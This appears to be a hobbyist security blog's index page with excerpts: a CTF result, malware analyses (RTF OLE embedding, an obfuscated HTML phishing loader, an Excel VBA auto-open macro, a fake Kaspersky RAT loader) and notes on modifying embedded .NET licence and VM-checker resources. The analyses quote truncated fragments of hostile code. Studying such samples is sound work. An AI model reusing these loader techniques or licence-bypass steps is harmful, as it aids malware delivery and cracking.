Me and my friend from school competed in a great CTF challenge this weekend. It ran from 03/12/21 8pm to 05/12/21 8pm, in which time we solved 32 challenges, gathering 6925 points. We came 41st in the students leaderboard and 96th overall, that’s very good for our first CTF. I learnt a lot from this CTF, especially about what I don’t know yet. As you can see, Reconnaissance and Forensics were our strongest categories.

.docx and .doc documents can contain embedded objects through a variety of methods, here we look at a sample using OLE linking and embedding. Sample obtained from any.run Property Value File Type Rich Text Format File Size 8.00 KB FileTitle OriginalRTF.bak.rtf MD5 00f576ddeaf60756bfe671858434931c SHA1 44c0d585482755dd945cea10458b82ca6cb620ff SHA256 23c8f0fb9912538eee0bde49b2007e7e0f4efbd8bca69ddb9c05fafcee6f03ab Initial static analysis {\rt{\object\objemb\objw1\objh1{\*\objclass Package}{\*\objdata 01050000020000000800... }}{\object\objautlink\objupdate{\*\objclass Word.Document.8}{\*\objdata 01050... You can see Word.Document.8 being used to embed a word document object. You can read up on how objects are embedded in RTF documents and OLE Exploits on the McAfee blog

This phishing sample was delivered through docsend and relies on the user opening the downloaded html file and logging into microsoft. Sample collected from JOESandbox. MD5: 7d6375abf1cff57c9d7da133cfaf0782 Loader <!-- TG9yZW0gaXBzdW0gZG9sb3Igc2l0IGFtZXQsIGNvbn ... --><script type='text/javascript'>document.write('\u003C\u0021\u002D\u002D\u0058\u0056\u005A\u0054\u0074\u006D...');</script><!-- TgZG9sb3Igc2l0IGFtZXQsIGNvbnNlY3R ... G1vZG8gdHlwaSwgcXVpIG51bmMgbm9iaXMgdmlkZW50dXIgcGFydW0gY2xhcmksIGZpYW50IHNvbGxlbW5lcyBpbiBmdXR1cnVtLg #### #### --> There’s a large comment full of likely random data to help evade detection, and a call to document.write, which writes text to the document stream. Packed First of all, it appears the embedded html page was packed using Proteger HTML, and their license expires on Sun Dec 05 2021 01:29:00 GMT, that’s in just 5 days of this post being published.

Introduction I started analysing this from finding it on the malware sandbox any.run, only at the end do I notice that it’s a Hack The Box challenge. Sample This sample is from any.run. Property Value File Type Microsoft Excel 97-2003 Worksheet File Size 35.6 KB MD5 b54c993e941836bf2c9c69948b30bcf0 SHA1 a3e6234b5310a3918b9e01c08badf3eb5f44a4b8 SHA256 3861795ece849d6b417a3c9870a7e0a0eccd27f74e706b9242d94d5e8885b705 VBA Extraction Using olevba, we can view the vba code inside. Sub Auto_Open() Dim fHdswUyK, GgyYKuJh Application.Goto ("JLprrpFr") GgyYKuJh = Environ("temp") & "\LwTHLrGh.

I’ve picked this sample from any.run. It appears to be a trojan tricking people who can’t afford Kasperky with a RAT, with the kasperky logo to match. Property Value File Type Portable Executable 32 File Size 862.00 KB FileTitle Kasperky Trial Reset FileDescription Protected with AzeFuscator Extended FileVersion 1,0,0,0 ProductName Protectd with AzeFuscator Extended MD5 d56e6af4d2f9170cf312f110f3fa8511 SHA1 1e5be78908b38b9c6e7d6593888e355ee270a6c2 SHA256 aef7cef69eb5e31673d034239aff208061fa61e8b5c8355b933e14f5818e4433 Loader analysis The loader is very simple, just some misc methods along with a call to CreateProcessA, and the imports fopen, fwrite and fclose, which are used for writing the unpacked executable to the disk.

When modifying a .NET program, you may notice that not all of the classes are actually there, but there might be some reference to Assembly.GetExecutingAssembly().GetManifestResourceStream(name) somewhere. Source It’s likely that there are executables in the program’s resources. Using CFF Explorer’s Resource Editor, we can verify this. + Icons + Icon Groups + Version Info + Configuration Files - .NET Resources |- License.Validator |- Virtual.Machine.Checker Expected In my mind, the steps therefore needed, as the programs I actually want to modify are embedded, are the following: